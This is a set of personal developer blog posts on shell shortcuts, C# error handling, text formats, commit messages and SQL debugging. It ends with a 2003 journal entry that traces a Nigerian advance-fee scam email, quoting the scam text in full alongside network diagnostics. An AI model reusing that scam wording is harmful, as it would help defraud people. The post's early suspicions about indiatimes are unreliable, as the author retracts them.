modified_time: '2014-02-10T18:39:49.408Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2819214199329621667
blogger_orig_url: https://timwise.blogspot.com/2014/02/bash-command-line-editing-cheat-sheet.html
---
[https://www.gnu.org/software/bash/manual/bashref.html#Readline-Interaction](https://www.gnu.org/software/bash/manual/bashref.html#Readline-Interaction)
* **ctrl-a/e** start/end of line
* **alt-f/b** forward/back a word
* **ctrl-w/alt-d** delete to start/end of word
* **alt-.** add argument from previous command (repeat to cycle) - love this one
* **ctrl-shift-_** undo (i.e. ctrl-underscore)
* **ctrl-y** paste (yank) deleted text
* **alt-y** paste older deleted text instead
* prefix with **alt+digit** (0-9) to do multiple, e.g. delete two words
* start with **alt-minus** to go backwards
Just a few notes I threw together for my own benefit. I finally got around to learning a bit more about editing commands on the Linux shell / terminal.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/11937840106/"><img
src="https://live.staticflickr.com/3808/11937840106_51c5d9f170_k.jpg" alt="Photo of flooded River Thames at Henley, half-submerging the benches of the Angel pub"></a>
</div>
<file_sep>---
title: Exceptions vs Wrapper Return Types
layout: post
---
## The possibilities
Here are two ways you can deal with something going wrong in your code in C#:
### Exceptions
```C#
public int GetAnswer()
{
if (someDependency.HasWhatWeNeed() is false)
{
throw new Exception("someDependency didn't supply what we needed");
}
return someDependency.Something() * 42;
}
```
### Returning failure
```C#
public Result<int> GetAnswer()
{
if (someDependency.HasWhatWeNeed() is false)
{
return Result("someDependency didn't supply what we needed");
}
return Result(someDependency.Something() * 42);
}
public class Result<T>
{
public readonly T Value;
public readonly string Error;
public Result(T value) { Value = value; }
public Result(string error) { Error = error; }
//...
}
```
(This is just a stub example of Result to illustrate what I'm talking about. A real Result type would need more a bit more thought than this. You could potentially use [OneOf](https://github.com/mcintyre321/OneOf) for your error return types.)
## Context
For most of C#'s life as a language exceptions have been a pretty normal way of getting things done.
For a web system, it's a common pattern to throw any time things aren't in place to proceed for any reason, and then have a broad catch in middleware that turns it into a sensible 500 exception and logs the exception to somewhere for troubleshooting.
Meanwhile other languages and paradigms have been learning from the real-world challenges of this approach and have been downplaying the role of exceptions for normal coding. In golang multiple-returns are used, with panic reserved for truly irrecoverable problems (e.g. out of disk space). In Rust normal error handling is done with [Options and Result types](https://dev.to/cthutu/rust-3-options-results-and-errors-part-1-4d52), and again has a less commonly used panic capability for catastrophic situations.
## Pros and Cons
Specifically within C# here's the reasons that would push you to chose one or the other approach:
### Exceptions
### In favour of exceptions
1. Minimal code required
2. Includes stack trace by default
### Against exceptions
1. More expensive than normal control of flow.
2. It is not possible to tell from looking at the GetAnswer() function signature whether the programmer expected this to fail under any circumstances, or whether it's something that can be relied on.
## Error Return types
### In favour of Error return types
1. Clear indication to reader that the author knew that this function could fail under known circumstances.
2. In the long run systems that rely heavily on exceptions eventually become a losing battle of endless exceptions in logs that never truly get dealt with and you can't tell the catastrophic urgent ones apart from the run-of-the-mill bearable problems. (I'm thinking support of production web systems here)
3. Forces a more thoughtful approach to failure modes of the system.
4. Marginal performance gain - only relevant for hot-path areas, trivial compared to optimising database/network/io areas.
5. Expression of intent: by throwing an exception the programmer is indicating "I never expected this to happen!!", by using an error return the programmer is saying "I know this can happen, but I can't carry on and the caller needs to deal with it."
### Against Error return types
1. More boilerplate code (because C# doesn't support this natively like Rust does)
2. Need to explain pattern to C# programmers who are used to relying on Exceptions
## How to choose
### Web systems & microservices
An illustrative example is a microservice having to handle being misconfigured:
* if all is well the system will be configured correctly
* misconfiguration can cause a system to fail
* the code can be expected to occasionally have to deal with receiving bad config
Systems consist of many concentric circles, a library is used by a single web service, which is part of a microservices architected platform etc etc.
If a single web service throws an exception, it should indicate:
* that there is a programming error such as an unhandled enum value in a switch statement, or
* complete system failure in the microservice (e.g. out of memory/disk)
The case where the system is misconfigured should be handled without using an exception, but instead use error-return types to indicate that it is unable to perform its duties due to the bad configuration it has been fed, rather than something unexpected going wrong.
### A rule of thumb
From my experience the heuristic to use is:
Restrict exceptions to all-gone-to-shit tear-the-stack-down-and-bail type failures.
Use return type errors to pass problematic conditions to callers to handle for anything your particular piece of code could reasonably be expected to have to deal with (bad inputs etc).
## A wealth of expressive options
Another way to think about this choice is that if you only ever use Exceptions, or conversely if you only ever use return types to indicate failure you are missing out on a richer way of expressing your intent in code.
By using only exceptions your medium for expression is limited to:
1. Fail -> throw Exception
2. Success
By adding return type failures you have a third way to express yourself, allowing a richer communication with fellow programmers:
1. Catastrophic unexpected fail -> throw Exception
2. Fail that could be reasonably expected -> return error type
3. Success
Why would we opt out of any one of these dogmatically as an absolute rule? They all have their place, even if we can argue and bike-shed endlessly about where to draw the lines.
There is value in consistency within a particular project with its own set of good tradeoff choices to be made. Do discuss the tradeoffs here with your team, and come to a consensus as to how you want to use these alternatives consistently within your own project(s).
## Summary
1. Throw exceptions for things that should never happen if the code is correct and the host computer is functioning properly (unhandled enum in switch statement, out of memory)
2. Return error types for all failure modes that could be reasonably expected (missing config, dependent microservices down etc).
## Are you sure?
Not entirely, this is my best attempt at figuring out this issue having listened to others. There's still a bit of me that thinks that maybe exceptions are actually fine, are less code, and where we need to deal with specific conditions we can throw and catch custom exceptions seamlessly bypassing layers of code. I think that's probably my resistance to change and learning kicking in, and I trust that golang and Rust really are learning from the failures of Java and C# in this arena both in terms of performance and in terms of writing reliable and supportable systems.
<file_sep>---
title: Text-based tools - the ultimate format for everything
layout: post
---
Having lived in the world of technology for two to three decades now, I've come to a fundamental truth: text formats are **the ultimate** format.
> "text formats are **the ultimate** format"
>
> ~ Me, just now
It's funny really because for everything we've invented, of every level of complexity, usability, shinyness etc, when it comes down to it, text is still king, just like it was in 1980 when I was still learning to talk.
## Properties of text formats
Things that make text inevitably superior to all other more complicated formats:
- Simple - **nothing** to go wrong.
- Use any text editor you like - vim, [vscode+vim](https://marketplace.visualstudio.com/items?itemName=yzhang.markdown-all-in-one), [intellij+vim](https://plugins.jetbrains.com/plugin/164-ideavim) are my gotos, but there are soooo many.
- Sync, backup and restore are trivial - try as they might, nothing beats a folder-tree of text files.
- They are ultimately portable - no change in technology (windows to linux, desktop to cloud, laptop to mobile) requires you to change anything, text is text, just copy them across and carry on, the ultimate defense against the ever-present pernicious vendor-lockin.
- Conflict resolution is always possible - edited two out of sync copies? No problem, there's a plethora of tools ([kdiff3](https://kdiff3.sourceforge.net/) is my favourite), or you can just do it manually if you wish.
- Version control supported - text files are trivially versionable in tools like git, everything understands it and can show diffs etc.
- Simple conventions like markdown, yaml, toml, and even slightly more complicated things like json don't fundamentally break any of the above.
- With some lightweight processing and structure (notably markdown), the same basic format can be automatically converted to a plethora of rich and beautiful forms, and with so many tools understanding formats like markdown you are spoilt for choice.
- Supports emoji - this one is more modern, but its usefulness is not to be underestimated, and thanks to utf-8 and unicode the plain-old-text-file can have rich emotions and symbols too.
- You can use all sorts of interesting tools to process text files, many from the linux cli stack such as `sed`, `grep` (or `ag`), plus full-on shell scripting to automate repetitive tasks [such as making a new blog post](https://github.com/timabell/timwise.co.uk/blob/eff17d609f862a14275c4fa0bd8319d13d59574e/new).
## Amazing things you can do with text files
The below are all things I personally swear by and use daily. I wish more things were like this.
Markdown is by far my favourite text format, and it's incredibly versatile. I'm on a crusade to basically convert everything to plain text / markdown files, having been repeatedly burnt by fancy binary formats (`.doc` anyone?). GraphViz ("dot" format) is also a notably powerful text-based system.
### Blogging
As per this blog, see ["Setting up a static website/blog with jekyll"](/2019/06/24/setting-up-a-jekyll-blog/) from 2019. No regrets there. Writing this in vim in a terminal.
### Slide decks
[reveal.js](https://revealjs.com/) can parse markdown files with a sprinkling of html & css allowed inline (very handy) and turn them into stunning modern presentations with slick animations and multi-step reveals, amazing.
I was trying to create some slides in google-slides thinking that would be the quick way, ran into some bizarre formatting limitation and went hunting for alternatives. I haven't looked back, at least for things I don't need real-time collaboration on.
You can see what I managed to do with [reveal.js for the Rust Workshop](https://rustworkshop.github.io/slide-decks/) - here's one of the [source slide markdown files](https://github.com/rustworkshop/slide-decks/blob/7eb002bfc1431025b47de97fd20e163456b5d7e5/decks/rust-workshop-master/slides.md?plain=1)
### Note taking
Markdown, VSCode with some markdown plugins, maybe even a [markdown-wiki](https://marketplace.visualstudio.com/items?itemName=kortina.vscode-markdown-notes) tool. [Markor](https://f-droid.org/packages/net.gsantner.markor/) on android. [Syncthing](https://syncthing.net/) to keep them in sync across devices. Works for me, and any conflicts due to editing files out of sync is easier to deal with than [tomboy](https://wiki.gnome.org/Apps/Tomboy)'s nasty XML format (yes I know XML is text but it's still naaaasty).
### Coding
This entry is only half tongue-in-cheek. I think it's worth pointing out that programmers have, after flirting with *many* other approaches, settled on plain old ASCII as being the one-true-format for explaining to a computer (and other programmers) what the computer is supposed to be doing. Pay attention to what programmers have learnt, there is much depth here on managing vast amounts of precise information in text form. Especially if you are not a programmer or not used to text tools there is much to learn from this world. You might think programmers are odd creatures that thrive on unnecessary complexity; nothing could be further from the truth, they (we) are *obsessive* about solving problems once and for all and being ruthlessly efficient in all things. The fact that programmer practices are seen as odd by the general public is more a sign of just how far programmers have optimised their lives away from the unthinking defaults of the masses than it is of any peculiarity of whim or culture.
### Graphs & flowcharts
The GraphViz dot format is amazing, it takes a bit of getting used to, but once you've got it then you can rearrange your flow chart with vim in a few keypresses and have the whole thing rearranged in milliseconds. Amazing.
There's even some neat web based real-time renderers:
- <https://dreampuf.github.io/GraphvizOnline/>
- <https://sketchviz.com/>
## The yucky bits
The almost-rans:
- Email's mbox format is kinda text, but due to the way it's set up is *horrible* for sync
- vcf for contacts, what happened there then?!
- ical for calendars, what a disaster, so close but yet never works, shame
- XML - nice try, turned out to be horrible in hindsight, but not before we'd written almost all software to use it (`.docx` anyone?)
The text world is a bit short on collaborative real-time editing - google-docs is still king on that one, though it would be perfectly possible for equivalent tools to be created for the above text formats and tools. Watch this space.
Crappy half-arsed implementations of markdown, looking at you Jira/Confluence/Slack (not really a problem of text, more something where we're almost there and then crappy WYSIWYG implementations wreck it).
<file_sep>---
layout: post
title: Yet another good-commit-messages post
date: '2016-03-18T15:25:00.000Z'
blogger_orig_url: https://timwise.blogspot.com/2016/03/yet-another-good-commit-messages-post.html
---
## Why you should care about writing good commit messages
1. It is extremely likely you won't be the last person to touch this code.
1. You will forget the details of exactly why you did something after a few weeks/months/years. Be kind to your future self.
1. Source control systems out-last [access to] ticket trackers by many years (Jira, Github-projects, Trello boards, etc. etc., how many have you seen in your time working on code? A lot more than you've seen source control systems I'll wager.) A link to a ticket is not enough. Copy the relevant context from the ticket into the commit message.
1. Not everything can be deduced from the code. Even with excellent variable/function/class/module names, and beautiful refactoring, the circumstances that led to a particular design or change are lost. Good comments adding context help, but sometimes you don't want to clutter code with temporally relevant comments; the source control gives you a suitable place to keep this information locked up with your patch of the day.
1. When someone wants to know if they can delete a line of code in the future, if they can't fathom why it was put there then the only way to find out is to delete it and see what breaks. By adding context in a commit message they can use the source-control history to get that context, and then decide whether that context is still applicable.
1. You might think your code is perfect and correct and needs no explanation beyond the code itself; but what if there's a bug? Now the only documentation is the buggy code. If I come to fix your code later how do I know what it was supposed to do without going back to first principles. What algorithm or design pattern were you trying to implement? What references did you use?
1. [Chesterton's Fence](https://thoughtbot.com/blog/chestertons-fence) - understand why something is the way it is before you change it.
> "Write every commit message like the next person who reads it is an axe-wielding maniac who knows where you live" ~ unknown
## Why I care about good commit messages
For reasons of chance I've ended up more than once maintaining and extending things created by other people, many of whom had moved on from the projects and were no longer contactable.
When dealing with a piece of code that has a behaviour that is clearly causing problems for users/customers etc. sometimes I have needed to understand *why* it was that way before I could know whether it could be changed without creating even bigger problems.
Another example was a buggy and complex algorithm implementation, but no clue left as to what the algorithm being implemented was, as a result a week of reverse-engineering the maths happened that could have been saved with a simple "this is an implementation of ..." with a hyperlink or algorithm name.
With the author of the code not available to ask I'm left only with the source code and `git blame` to fathom why it's like that.
When you find the commit that added the patch and it's one of the following then you realise the author was not taking into account future maintainers:
- "wip"
- an entire fully formed set of behaviour appears in one giant commit with no explanation (perhaps copied from somewhere else)
- a mention of a ticket number from a defunct ticket tracker with no further explanation
It seems to me that it doesn't take much additional effort to rattle out a sentence or two with some context on why something is being changed for the benefit of future maintainers. Especially when it's a complex patch that maybe took more than a day to create.
Given that each line of code is read many more times than it is written it seems that being "lazy" with explanation is not delivering the highest quality output to your client/employer/project.
I, like many developers, also value speed of delivery, fast iteration, early prototypes that may get rewritten; but you can still move fast while taking a few minutes for each patch to explain it. And you have to think that just because you might throw this one away, you also might not, and you just don't know yet.
## How to make them better
There's not much for me to add on what's already been written, so read these articles on the specifics of writing good commit messages.
* <https://vip.wordpress.com/documentation/commit-messages/>
* <https://robots.thoughtbot.com/5-useful-tips-for-a-better-commit-message>
* <http://chris.beams.io/posts/git-commit/>
* <https://gds-way.cloudapps.digital/standards/git.html>
* <https://mislav.net/2014/02/hidden-documentation/>
* [Pull Request Etiquette gist by mikepea](https://gist.github.com/mikepea/863f63d6e37281e329f8) - covers pull request quality as well as individual commits
My personal additions to this list:
* A list of highlights of changes in bullets is often nice to add, think of it as a tourist's guide to your patch. It makes it easier to spot the key changes in a large diff, and can make code-reviews more effective.
* Hard-wrapping lines shouldn't be required, that should be an editor/display concern but unfortunately the git tooling doesn't agree so doesn't wrap anything so you might have to hard-wrap.
## Are you expecting every tiny change to be like this?
No. Some patches really don't need much explaining, e.g. re-applying default code formatting or fixing a typo; but you should always consider what context a future reader might need.
## Are your patches atomic incremental improvements
If it's hard to write a good message, it might be that you are not taking the time to craft good single-purpose commits.
## Examples of good
* <https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f076ef44a44d02ed91543f820c14c2c7dff53716> ([via reddit](https://www.reddit.com/r/linux/comments/3y6st0/funny_commit_message_in_kernel/)) - what I like about this one is:
* It adds **context** that you could never get from code (note some is repeated more briefly in code comments which is a good thing)
* It explains the new behaviour **in human terms**.
* It's easy to read (good quality English prose)
* <https://github.com/DFE-Digital/find-teacher-training/pull/159/commits/00e24dbc216836dd73281688491b8da355706d81> - what I like about this one is:
* It's part of a PR that is also well described & reviewed
* It adds context (about the thing that will call the endpoint added in the patch, i.e .the reason it was created)
* It mentions a PR in another repo that was a source for some of the code & ideas, yet more context for answering the question "why was this done and why is it like this?"
* The co-author is attributed (github shows this which is nice), this might give you someone to talk to about if they're still around
* It provides an outline of the patch so you don't have to parse the whole diff to get a flavour of how the patch changes behaviour. When you have a lot of patches to read because you're looking for something in the history this can be a big timesaver.
* It gives insight into why certain decisions were made about the final shape of the patch (e.g. why just /healthcheck and not /ping as well)
## Video presentations on why good history matters
Remember, your code and your commits can last a veeeeeery long time and you never know what poor soul will have to understand what you did and why years later... when you have time watch this video:
<iframe width="560" height="315" src="https://www.youtube.com/embed/1NoNTqank_U" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<iframe width="560" height="315" src="https://www.youtube.com/embed/G45hqWNScvE" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<file_sep>---
title: "Real IT Stories"
date: 2004-08-14
slashdot_url: https://slashdot.org/journal/80312/real-it-stories
---
<p>Not bad for m$ technical <a href="http://www.microsoft.com/technet/abouttn/subscriptions/flash/promo/realstories/topten.mspx">comedy</a></p>
<file_sep>---
layout: post
title: Debugging stored procedures in VS2010 / SQL Express
date: '2012-05-22T16:58:00.000Z'
author: <NAME>
tags:
modified_time: '2014-10-16T17:40:31.093Z'
thumbnail: http://1.bp.blogspot.com/-v43Zoh8QMUc/T7vIRbLcQ1I/AAAAAAAAAFo/465qvN6CYFM/s72-c/debug-t-sql-attach.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2656726104783111677
blogger_orig_url: https://timwise.blogspot.com/2012/05/debugging-stored-procedures-in-vs2010.html
---
Debugging stored procs in a _local_ SQL Express install with Visual Studio
2010.
Enable TCP/IP - see [http://timwise.blogspot.co.uk/2012/05/enabling-tcpip-in-sql-express-2008-r2.html](http://timwise.blogspot.co.uk/2012/05/enabling-tcpip-in-sql-express-2008-r2.html)
In Visual Studio, Server Explorer, Connect to your server as localhost instead
of .\SQLEXPRESS so that you connect through TCP/IP and not shared memory (which
doesn't allow debugging for some reason)
Find the project in your solution which actually executes the stored procedure,
right-click > properties > debug > "Enable SQL Server debugging"
Run your project
You may need to hit "stop" and re-attached (debug > attach to process)
explicitly selecting "T-SQL code" in the "attach to" box (and optionally
managed as well). It *should* automatically select T-SQL but it seems to be hit
and miss.
Set a breakpoint in your stored procedure:
* Server explorer,
* the connection you added,
* stored procs,
* right-click the proc name > open
* set a break point in the text of the stored proc
* if it is not a solid red dot then something went wrong
Run the part of your program / website that will cause the proc to be called.
If the breakpoint isn't hit, check that the types in the attach-to-process list
include T-SQL (doesn't seem to always work).
I only got the damn thing to work once. If it doesn't work you get no reason at
all which is just crap. The main problem I have is that the attach just quietly
drops T-SQL even if you explicitly request it. Shoddy coding from Microsoft in
my opinion.
The next best thing is to right-click the stored proc, click "step into" and
input the values manually. (Which also requires a tcp/ip connection to the
local sql express and is fussy).
Another message encountered a couple of days later without changing anything at
all when attaching to the already running web dev process: "[<span
id="goog_211408035"></span>User Could Not Execute Stored Procedure
sp_enable_sql_debug<span
id="goog_211408036"></span>](http://msdn.microsoft.com/en-us/library/ms241735(v=vs.100).aspx)"
# References
* [http://stackoverflow.com/questions/4737175/the-breakpoint-will-not-currently-be-hit-error-when-trying-to-debug-a-tsql](http://stackoverflow.com/questions/4737175/the-breakpoint-will-not-currently-be-hit-error-when-trying-to-debug-a-tsql)
* [http://social.msdn.microsoft.com/forums/en-US/vstsdb/thread/f5247d99-06f0-4ae3-9371-04c70f750647/](http://social.msdn.microsoft.com/forums/en-US/vstsdb/thread/f5247d99-06f0-4ae3-9371-04c70f750647/)
* [http://support.microsoft.com/kb/316549/en-us](http://support.microsoft.com/kb/316549/en-us)
(from comment below)
# Screenshots





<file_sep>---
title: "i don't do forwards"
date: 2004-12-25
slashdot_url: https://slashdot.org/journal/93877/i-dont-do-forwards
---
<p>... but this is a classic</p>
<p><a href="http://community-2.webtv.net/@HH!3B!01!109A6273ED6D/Babajani1/MurphysLaw/">http://community-2.webtv.net/@HH!3B!01!109A6273ED6D/Babajani1/MurphysLaw/</a></p>
<p>oh, and merry xmas.<nobr> </nobr>:)</p>
<file_sep>---
title: Always Add Argument Names
layout: post
---
An argument (lol) for the use of explicit argument names in C# function calls even when they seem redundant.
1. You can assert correctness when reviewing the call site in a dumb text display (e.g. a patch in a github pull request)
2. Parameter-order refactoring won't introduce subtle bugs and breaking changes.
This is particularly important when you have multiple arguments of the same type.
It's also a good idea when the call doesn't immediately make it obvious what the meaning of the parameter is. E.g. `Foo(3)` vs `Foo(sizeInMeters: 3)`.
## No argument names (bad)
Starting point:
```c#
void Main()
{
Foo("Home", "Blah"); // don't do this
}
void Foo(string importantThing, string otherThing)
{
switch (importantThing)
{
case "Home":
DoSomething();
break;
default:
DoSomethingElse();
break;
}
Log(otherThing);
}
```
If `Foo()` is defined in a different file it's hard to eyeball `Main()` and tell if the arguments line up properly.
If I now re-order the arguments of `Foo()` can you easily spot that the call site in `Main()` is now incorrect?
```c#
void Main()
{
Foo("Home", "Blah"); // Now broken!! But can you tell?
}
void Foo(string otherThing, string importantThing) // <-- parameters flipped
{
switch (importantThing)
{
case "Home":
DoSomething();
break;
default:
DoSomethingElse();
break;
}
Log(otherThing);
}
```
## With argument names (good)
Starting point:
```c#
void Main()
{
Foo(importantThing: "Home", otherThing: "Blah");
}
void Foo(string importantThing, string otherThing)
{
switch (importantThing)
{
case "Home":
DoSomething();
break;
default:
DoSomethingElse();
break;
}
Log(otherThing);
}
```
You can now easily see that `"Home"` is going to `"importantThing"`, even in a plain-text view of the file.
If I now re-order the arguments of `Foo()` again, it *doesn't* break because the compiler knows which string to connect to which parameter. Win.
```c#
void Main()
{
Foo(importantThing: "Home", otherThing: "Blah"); // still valid!
}
void Foo(string otherThing, string importantThing) // <-- refactored
{
switch (importantThing)
{
case "Home":
DoSomething();
break;
default:
DoSomethingElse();
break;
}
Log(otherThing);
}
```
<file_sep>---
title: "Nigerian Scam"
date: 2003-11-29
slashdot_url: https://slashdot.org/journal/53554/nigerian-scam
---
<p>Edit: Apparently indiatimes is genuine. (sorry! India Times) must've been just a webmail account. Couldn't see half the site from home. Oh well. Maybe this isn't so exciting then. -4/12/03<br>------------------------------------------</p>
<p>Thought I'd do some detective work today.<br>This is a bit of an obtuse one, but here goes anyway.</p>
<p>I received a copy of the Nigerian scam via email (Appendix 1).</p>
<p>Facts:</p>
<p>source IP address: 172.16.17.32<br>spam sourced using a <a href="http://www.nyc.com/">http://www.nyc.com/</a> mail account<br>reply address 1: <EMAIL><br>reply address 2: <EMAIL></p>
<p>Analysis:</p>
<p>Interesting trace, the source IP Address is owned by SKY2Net ltd. (GILAT-SATCOM-BLOCK-31-32-40-46)<br>Are the spammers using satellite technology to avoid being tracked down?</p>
<p>I had a look at nyc.com and it appears to have a valid web-mail service<br><a href="https://nyc-mail.nyc.com/cgi-bin/signup/signup.pl">https://nyc-mail.nyc.com/cgi-bin/signup/signup.pl</a><br>Think I sent them a mail to their abuse section.</p>
<p>Go.com is valid and provides a web based email service which can be gained online<br><a href="https://register.go.com/go/register">https://register.go.com/go/register</a></p>
<p>I looked at <a href="http://www.indiatimes.com/">http://www.indiatimes.com/</a><br>There's a reasonably convincing first page (plenty of adverts - if we can't be conned then I suppose a bit of advertising kick-back will do!), however you can't get many other pages and the "site" quickly looks flaky. I reckon this was set up by the spammers to convince people the address was valid.<br>The site seems to exist on multiple IP addresses. See: <a href="http://uptime.netcraft.com/up/graph?site=www.indiatimes.com">http://uptime.netcraft.com/up/graph?site=www.indiatimes.com</a> where all the IP addresses seem to be listed. Which address you get changes regularly (minutes apart) - see Appendix 6<br>Appendix 3 contains one of the traces, which finishes with an unreachable domain name. Very odd.</p>
<p>looking up the MX records reveals the mail server to be smtp.indiatimes.com (Appendix 4)</p>
<p>smtp.indiatimes.com (192.168.3.11) seems to work but is hosted somewhere else, couldn't get any useful info out of tracert or ripe.net. (Appendices 2 and 5)</p>
<p>Conclusions?<br>None<br>I hate people who exploit other people. Through whatever means & medium.</p>
<p><b> <i>Appendices:</i> </b><br><b>1) The received email (with headers)</b></p>
<p>From: - Tue Nov 25 07:46:47 2003<br>X-UIDL: <1618.192.116.66.219.1069698616.<EMAIL>><br>X-Mozilla-Status: 1001<br>X-Mozilla-Status2: 00000000<br>Return-Path: <<EMAIL>><br>Received: from nyc-mail.nyc.com ([66.111.12.66]) by mta6-svc.business.ntl.com (InterMail vM.4.01.03.37<br>201-229-121-137-20020806) with SMTP id <20031124183749.KMRS21828.m<EMAIL>> for<br><<EMAIL>>; Mon, 24 Nov 2003 18:37:49 +0000<br>Received: (qmail 45052 invoked by uid 79); 24 Nov 2003 18:30:17 -0000<br>Received: from 172.16.17.32 (NYC.com Mail authenticated user <EMAIL>) by mail-nyc.nyc.com with HTTP; Tue, 25<br>Nov 2003 02:30:16 +0800 (SGT)<br>Message-ID: <1618.172.16.17.32.106969861<EMAIL>><br>Date: Tue, 25 Nov 2003 02:30:16 +0800 (SGT)<br>Subject: REPLY URGENTLY<br>From: Muhammed <<EMAIL>><br>To: <EMAIL><br>User-Agent: NYC.com Mail/1.4.2<br>MIME-Version: 1.0<br>Content-Type: text/plain;charset=iso-8859-1<br>Content-Transfer-Encoding: 8bit</p>
<p>VERY URGENT AND STRICTLY CONFIDENTIAL BUSINESS PROPOSAL.</p>
<p>PLEASE I WANT YOU TO RELPY ME THIS MAIL TO MY ALTERNATIVE EMAIL ADDRESSES<br><EMAIL> and <EMAIL></p>
<p>Dear Sir,</p>
<p>I am <NAME> the son of the late Gen. <NAME>, former head<br>of State of Nigeria who died on 8th June 1998 while in office. Since the<br>death of my father the present Government of Chief Olusegun Obasanjo has<br>been tormenting members of the Abachas family including family friends.<br>All businesses and property owned by the Abachas have been confiscated by<br>the Government and all our Bank Account in Nigeria and abroad have been<br>frozen. A quick reference of Newsweek publication of March 13th 1999 were<br>88million dollars was taken from us will give you an insight of what I<br>have gone through. After a short while I was arrested and detained in<br>prison custody, the government came up with a trump up charge against me<br>and honestly speaking I have been in detention since November 1999 and I<br>was only released on Thursdays (11-07-02) by the supreme court of Nigeria<br>who passed judgment in my favor.</p>
<p>During the reign of my father as the president of this country, an<br>Aluminum Smelter Company of Nigeria (Alscom) contract was revealed. The<br>contract was for the construction of plant, at Ikuta Abasi in Akwa Ibom<br>State of Nigeria, for production of ingots and billets required as raw<br>material for Aluminum and Allied Industries, Reynolds Incorporated of<br>America, Phoenix and M&F Companies of Switzerland conducted the<br>feasibility studies. The contract was awarded to Ferrostall AG of Germany.<br>However, after the revaluation of the contract, Ferrostall AG collected<br>its own share of the increment in project cost, while my father's share of<br>fifty-eight Million U.S. Dollars (US$58,000,000:00) was deposited on my<br>name with a security company here in Nigeria for safety keep and I know<br>that my father was planning of how to send this money abroad before his<br>sudden death in June 8 1998. Since then the money has been with the<br>security company up till date. This US$58M was secretly packaged in a<br>trunk box and the certificate of deposit where on my name and is still in<br>my possession.</p>
<p>Hence all plane is to ship this money abroad through a diplomatic means<br>without the knowledge of anybody from outside knowing my involvement in<br>this money, to avoid be seized due to my presently situation and also I am<br>handicapped as what next to do since I am not conversant with<br>international monitory policies. Hence I am contacting you as a reputable<br>and trustworthy person, with a well experience and able hand to help. This<br>was to bit the security system in Nigeria Because I want you to claim the<br>money on my behalf. I have declared to the security company that the<br>consignment belongs to (YOU) as my foreign business partners. Actually I<br>got your contact from a reliable source, and also I believe you are in a<br>good position to assist me to transfer this fund for good investment.</p>
<p>Upon receipt of your willingness to assist me claim this money I will then<br>contact my personal attorney to draft a power of attorney that will<br>authorize you as the beneficially of this money so that you can handle<br>this transaction on my behalf. And as soon as this money leaves Nigeria I<br>will travel out to seek asylum either in Europe or America. My contract<br>with APEX FINANCE AND SECURITIES GROUP remains few weeks to expire and I<br>am down broke to renew the duration with the Security Company.</p>
<p>As a matter of urgency, I will like you to send to me immediately your<br>telephone and fax number. I shall send you all the clearance documents by<br>fax. I will then forward your name as the beneficiary and my foreign<br>business partner to the Security Company. You will be entitled to 20% of<br>the total sum involved for your assistance, 5% will be set aside for<br>reimbursement to you for any incidental expenses that may be incurred in<br>the course of the transaction. Your URGENT response is needed. I want you<br>to call my Attorney Mr. <NAME> on 234 1 7765468 for more detailed<br>directives information and the nest required step of how we have to make<br>move immediately as i have told him about you and he is to handle all the<br>processing with you on my behalf. All your REPLY must go through these<br>our family private email address: <EMAIL> and<br><EMAIL> , I will also need your private and direct<br>telephone and fax number for easy reach.</p>
<p>Please this is a very confidential matter, you don't disclose to anybody<br>for us to have success.</p>
<p>Best regard</p>
<p><NAME></p>
<p><b>2) The smtp server ehlo</b></p>
<p>telnet smtp.indiatimes.com 25</p>
<p>ehlo me<br>220 Sat, ESMTP 29 Nov 2003 19:49:07 +0530<br>250-localhost.localdomain Hello 81-86-251-237.dsl.pipex.com [172.16.17.32], pleased to meet you<br>250-8BITMIME<br>250-SIZE<br>250-DSN<br>250-ONEX<br>250-ETRN<br>250-XUSR<br>250 HELP</p>
<p><b>3) A trace route to www.indiatimes.com (one of a varying set)</b></p>
<p>C:\>tracert www.indiatimes.com</p>
<p>Tracing route to indiatime.speedera.net [172.16.31.10]<br>over a maximum of 30 hops:</p>
<p>
1 21 ms <10 ms 10 ms my.router [1192.168.127.12]<br>
2 20 ms 20 ms 10 ms 81-86-240-1.dsl.pipex.com [192.168.127.12]<br>
3 * * * Request timed out.<br>
4 20 ms 20 ms 20 ms POS4-0.GW1.LND9.ALTER.NET [172.16.31.10]<br>
5 20 ms 20 ms 20 ms so-3-0-0.xr1.lnd9.alter.net [192.168.127.12]<br>
6 20 ms 20 ms 20 ms so-0-1-0.TR1.LND9.ALTER.NET [172.16.17.32]<br>
7 20 ms 20 ms 20 ms POS1-0.BR1.LND9.ALTER.NET [172.16.17.32]<br>
8 20 ms 20 ms 20 ms 172.16.58.310<br>
9 10 ms 10 ms 20 ms ge-7-0.ipcolo1.London1.Level3.net [2172.16.31.1031]<br>
10 20 ms 20 ms 20 ms 172.16.58.3<br>
11 20 ms 20 ms 30 ms www.crone-corkhill.co.uk [195.50.97.131]</p>
<p>Trace complete.</p>
<p><b>4) mx nslookup of indiatimes.com</b></p>
<p>C:\>nslookup<br>Default Server: cache0005.ns.eu.uu.net<br>Address: 172.16.17.32</p>
<p>> set type=mx<br>> indiatimes.com<br>Server: cache0005.ns.eu.uu.net<br>Address: 172.16.17.32</p>
<p>Non-authoritative answer:<br>indiatimes.com MX preference = 5, mail exchanger = smtp.indiatimes.com</p>
<p>indiatimes.com nameserver = timesgate2.toi.co.in<br>indiatimes.com nameserver = ulka.timesgroup.com<br>indiatimes.com nameserver = ethome.dhakdhak.com<br>indiatimes.com nameserver = timesgate.toi.co.in<br>timesgate2.toi.co.in internet address = 192.168.3.11<br>ulka.timesgroup.com internet address = 172.16.58.3<br>ethome.dhakdhak.com internet address = 172.16.58.3<br>timesgate.toi.co.in internet address = 172.16.58.3<br>></p>
<p><b>5) Trace to smtp.indiatimes.com server</b></p>
<p>C:\>tracert smtp.indiatimes.com</p>
<p>Tracing route to smtp.indiatimes.com [203.199.93.5]<br>over a maximum of 30 hops:</p>
<p>
1 20 ms <10 ms <10 ms my.router [192.168.1.1]<br>
2 10 ms 20 ms 20 ms 81-86-240-1.dsl.pipex.com [81.86.240.1]<br>
3 * * * Request timed out.<br>
4 20 ms 30 ms 20 ms POS5-0.GW2.LND9.ALTER.NET [146.188.56.101]<br>
